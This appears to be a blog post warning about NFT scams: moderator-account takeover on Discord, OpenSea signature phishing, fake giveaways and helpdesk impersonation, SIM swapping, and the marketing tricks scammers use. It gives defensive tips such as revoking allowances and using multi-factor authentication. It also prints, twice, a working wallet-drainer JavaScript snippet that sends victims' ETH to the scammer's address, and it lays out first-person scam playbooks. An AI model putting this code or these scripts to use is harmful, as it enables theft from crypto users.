How to hack NFT projects: Learn from the Attack on OpenSea
Hi, I'm Manabu.
Please take a look at the tweet below:
ちなみに、最も簡単な「NFT詐欺」は「配布キャンペーン」だと思います。
— Manabu (@manabubannai) March 5, 2022
Twitter上で「無料のNFT配布キャンペーン」を実施しつつ、当選者を「スパムサイト」に誘導します。そのサイトからNFTを獲得すると、同時に「自分のウォレット残高」も抜かれる仕組みです。システム構築は簡単なので、要注意です
I got more than 100 RTs, and I will translate it as follows:
The easiest way of NFT fraud is a giveaway campaign. Simply start a giveaway campaign and let the people access a scam page. If the people mint the NFT from the page, they lose their funds. It's very easy to create this kind of system. Be careful.
In this article, I will explain the basics of NFT hacking.
Table of contents
- 1. Learn from Axie Infinity's hack
- 2. What is Social Engineering
- 3. Scammer is a great marketer
1. Learn from Axie Infinity's hack
Actually, you can be a copycat using this way, but please do not. Let me explain, citing this article and @0xinuarashi's tweet thread.
There are three participants
- The scammer
- Discord Moderator A
- Discord Moderator B
Okay. So let me explain the detail. There are three steps.
Step1. The scammer ban "Moderator A"
The scammer will join the Discord server and report like below:
- "Moderator A is a scammer. Please ban him".
And then, the other moderator will ban "Moderator A" for security reasons even though they have no clue about that.
Step2. The scammer will contact Moderator A
The scammer sends a DM to "Moderator A" as an impersonator. And ask "Moderator A" to prove that you are innocent. And then, the scammer asks "Moderator A" to send his passport and Authentication Token of Discord.
In this case, Authentication Token is very important. Because if you show the token to someone, you lose access control of your account. That means "Moderator A" lost access control of his account, and the scammer got full access control of it.
Step3. The scammer will contact "Moderator B"
Lastly, the scammer sends a DM to "Moderator B" as an impersonator of "Moderator A." And then, ask to unban his access showing his passport and Authentication Token.
If Moderator B unbans the scammer, it will cause tragedy. The scammer will be able to post a comment to Discord server like below:
- "Flash sale is open. Now you can mint new NFTs only with 0.1ETH".
Needless to say, a flash sale is fake that will lead community members to the scamming website. If you mint NFTs, you lose your funds.
The actual code of Axie Infinity's hack is like so:
function sendEth() { let givenNumber = document.querySelector ("#mintnumber").value; web3.eth.sendTransaction({ from: web3.currentProvider.selectedAddress, to: '0x809771aB194355a5Cfa67ae1902c6359Db25FCaC', value: (web3.utils. towei (givenNumber,'ether')*0.1), }); }
The code is actually easy. You can use it in copy and paste. And please look at the code below:
- from: web3.currentProvider.selectedAddress,
- to: '0x809771aB194355a5Cfa67ae1902c6359Db25FCaC',
- value: (web3.utils. towei (givenNumber,'ether')*0.1),
You can see the scammer's address(0x809...). The interesting thing about blockchain is you can actually see the scammer's transactions, and it's immutable. Here is the screenshot:
There are many transactions of 0.1 Ether. If you want to see more, please visit Ether scan.
Next, I will explain the more dangerous way of NHT hacking.
How to hack OpenSea
Do you know the incident of OpenSea's hack? Here is the detail:
🏴☠️ OPENSEA NFT HACK EXPLAINED THREAD 🏴☠️
— isotile 🦇🔊 (@isotile) February 20, 2022
28 days ago the hacker uploads a new smart contract, he already knows well that his goal is to get as many signatures as possible
🧵 1/4 pic.twitter.com/WMD9JrrvII
The above is a basic phishing scam. The scammer sent emails to OpenSea's users and then asked to update their accounts. Clicking on the update button will trigger the smart contract below:
Today he executes the smart contract function to steal the NFTs before their listings expire
— isotile 🦇🔊 (@isotile) February 20, 2022
He can do that because he has your signatures stored on his server
🧵 3/4 pic.twitter.com/tJOMspXySr
The image is small, but you can see the word stealNFTs, which the scammer collects the signature of your Metamask wallet. That means the scammer can get your coin/NFTs from your wallet.
Warning: Time lag of hacking
In OpenSea's case, the timeline is like below:
- The scammer sends a phishing mail.
- Doing nothing about a month.
- The scammer triggered the code.
The reason for the time lag is to collect the victim's address as much as he can.
This means there is a chance that your wallet is in danger now because of the signature that you made it past.
How to solve the potential problem? Here is the way.
The importance of revoke
If you use Revoke.cash, you can revoke the permission you accepted your Metamask's account before. For example, look at below:
I used this tool, and please take a look at inside the red frame like so:
- Unlimited allowance to 0xA79...(Curve.fi)
- Unlimited allowance to Uniswap
- Unlimited allowance to Polygon Bridge
In my case, I gave unlimited allowances to Curve.fi, Uniswap, and Polygon Bridge which are trustworthy for me. So if you see the suspicious one, better to revoke it. It's dangerous.
How to avoid hacking
Revoke is important, but not connecting suspicious websites is more important, obviously. Below is the screenshot of the important message.
When you use Metamask, be careful of the red frame. In this case, you can see the word "https://opensea.io" and "SET APPROVAL ALL," right?
This means you will set all approval to OpenSea. If you think it's ok, just connect it. But if not, just do not.
Sometimes people are rush to NFT's mint sale. Rushing will cost you at times. The scammer will take advantage of it.
2. What is Social Engineering
I had explained Axie Infinity's hack. We call this — Social Engineering. In short, hack something using a human error.
Finding a bug in the code is difficult, but causing a human error to hack the product is sometimes easy.
Let's study the basics of Social Engineering to protect ourselves.
Method1: NFT giveaway campaign
Let me introduce my tweet again.
ちなみに、最も簡単な「NFT詐欺」は「配布キャンペーン」だと思います。
— Manabu (@manabubannai) March 5, 2022
Twitter上で「無料のNFT配布キャンペーン」を実施しつつ、当選者を「スパムサイト」に誘導します。そのサイトからNFTを獲得すると、同時に「自分のウォレット残高」も抜かれる仕組みです。システム構築は簡単なので、要注意です
Translation
The easiest way of NFT fraud is a giveaway campaign. Simply start a giveaway campaign and let the people access a scam page. If the people mint the NFT from the page, they lose their funds. It's very easy to create this kind of system. Be careful.
Now you can easily understand the way of the hack, right? Also, you know the code already like so:
function sendEth() { let givenNumber = document.querySelector ("#mintnumber").value; web3.eth.sendTransaction({ from: web3.currentProvider.selectedAddress, to: '0x809771aB194355a5Cfa67ae1902c6359Db25FCaC', value: (web3.utils. towei (givenNumber,'ether')*0.1), }); }
There are so many pump-and-dump in the NFT market, and people easily get many RTs using giveaway campaigns even though the Twitter account doesn't have many followers. Simply put, the situation is good for scammers.
Learn from the past
History will repeat itself. Please take a look at below:
Attackers leave malware-infected floppy disks, CD-ROMs, or USB flash drives in locations people will find them (bathrooms, elevators, sidewalks, parking lots, etc.), give them legitimate and curiosity-piquing labels, and wait for victims. — Wikipedia
Attackers left floppy disks or CD-ROMs in the past. Attackers leave NFT giveaway pages nowadays. Attackers left USB flash drives in the past. Attackers leave Ledger wallets on eBay.
Please be careful; nobody can help you in the crypto world.
Method2: Changing Helpdesk
This is also a common way of social engineering. Let me explain using the past case.
For example, the scammer goes into the company and then put the paper on the bulletin board like so:
Notice: Change Helpdesk email address
- Old: help-desk-old@gmail.com
- New: help-desk-new@gmail.com
Possibly, the scammer asks the employee to put the paper in exchange for money. Anyway, if you get the message to "help-desk-new@gmail.com," you can easily cheat them, which is an old example, but we can use it in current days.
How to chankge OpenSea's Helpdesk
The following sentence is just an example, but let me write it down.
If I were a scammer, I would use people's confusion. For example, I use this kind of tweet:
🏴☠️ OPENSEA NFT HACK EXPLAINED THREAD 🏴☠️
— isotile 🦇🔊 (@isotile) February 20, 2022
28 days ago the hacker uploads a new smart contract, he already knows well that his goal is to get as many signatures as possible
🧵 1/4 pic.twitter.com/WMD9JrrvII
The tweet is more than 4,000 RTs, which means there is a big buzz in the market. So along with this, I will do like so:
- Buy a Twitter account that has many followers
- Change the name to "OpenSea's Helpdesk"
And then, just change the Helpdesk tweeting a post like so:
- We've created a new Helpdesk which is for someone who is a victim of OpenSea's hack.
That's it. Possibly, you can get some messages from people who are very upset because of the hack. But, again, rushing will cost you. The scammer will take advantage of it.
Method3: SIM swap (Most dangerous)
This is the most dangerous way of hacking. Let's dig in.
In short, SIM swap is a kind of mix of social engineering and SIM hacking.
For example, the hacker will contact a mobile carrier as an impersonator of you. And then, he asks to suspend the SIM card because of loss. And he also asks to reactivate a new SIM card.
If this happens, suddenly, you lose control of your SIM card, which means you cannot receive any SMS. But, on the other hand, the hacker has full access control of your phone and SMS.
Needless to say, the hacker can reset your ID/Password using SMS authentication or hack your SNS account, and it will possibly harm your friends as well.
How to prevent this? The solution is multiple authentification, which means you have to set multiple authentications to reset your password. For example, I use three authentification like so:
- SMS auhentification
- Google auhenticator
- Email auhentification
You know, sometimes it's really tiring to login into my account, but it will definitely help me. So I use this authentification of my Binance account, which is very important for me.
*I don't say that you have to use three authentification for all of your accounts. Simply use it when it comes to essential accounts.
3. Scammer is a great marketer
This chapter is a kind of something extra.
I have pretty much experience in digital marketing for ten years. My achievement is getting $2 million in revenue from my blog and 550k Subscribers on my YouTube channel.
From my point of view, I think the scammer is a great marketer. Why? Because the methods are similar in scamming and online marketing, which will cause a misunderstanding, let me explain.
Six key principles of social engineering
I have read Wikipedia's page about social engineering that is saying like so:
Six key principles
- Authority
- Intimidation
- Social proof
- Scarcity
- Urgency
- Familiarity
There are pretty much related to online marketing. To be honest, I use these kinds of techniques when I try to sell something online. Let's dig in.
The way of scam marketing
In the previous chapter, I had explained Axie Infinity's hack. And using this scenario, let me design the way of scam marketing. Let's begin.
For example, I stole the Moderator's account using social engineering and then announced a flash sale, which is a scam. And I will write like this on the website:
- This is only one time event => Intimidation
- Minted NFTs: 175/300 => Social proof & Scarcity
- Limited time only => Urgency
And also, I will create many Discord accounts to post like so:
- Spam account A: I got a limited NFT! This is great!
- Spam account B: This is a great opportunity. Don't miss it.
- Spam account C: New NFT's price definitely goes up for sure.
That's it. I've just followed Six key principles that increase scamming pages' conversion rate. Again, Rushing will cost you at times. The scammer will take advantage of it.
Lastly: knowledge will save you
This article is ending soon, but let me say the reason why I'm writing like this.
- Unfortunately, there are bad people in the world
- Unfortunately, there are bad people in the NFT market
- Unfortunately, the scammers execute scam campaign
So, how to solve this kind of problem?
My answer is that learning is the only solution.
Some people say like "please do not write this kind of article. Because it will increase new scammers." But is this true? I don't think so.
The knowledge level of this article is not so high. You can easily google it and study it without reading my article. Needless to say, people who want to do scamming have already searched it before.
I had written this article for someone interested in new technology and wants to know the basic securities. Even though the guy looks like knowing this field, sometimes they don't know about revoke, which you already know, right?
So, I have a small favor of you. If possible, please share this article on Twitter or Facebook or something. Or possibly, just send it to your friend so that we can prevent the tragedy before that happens.
That's it. Thank you for reading my article :)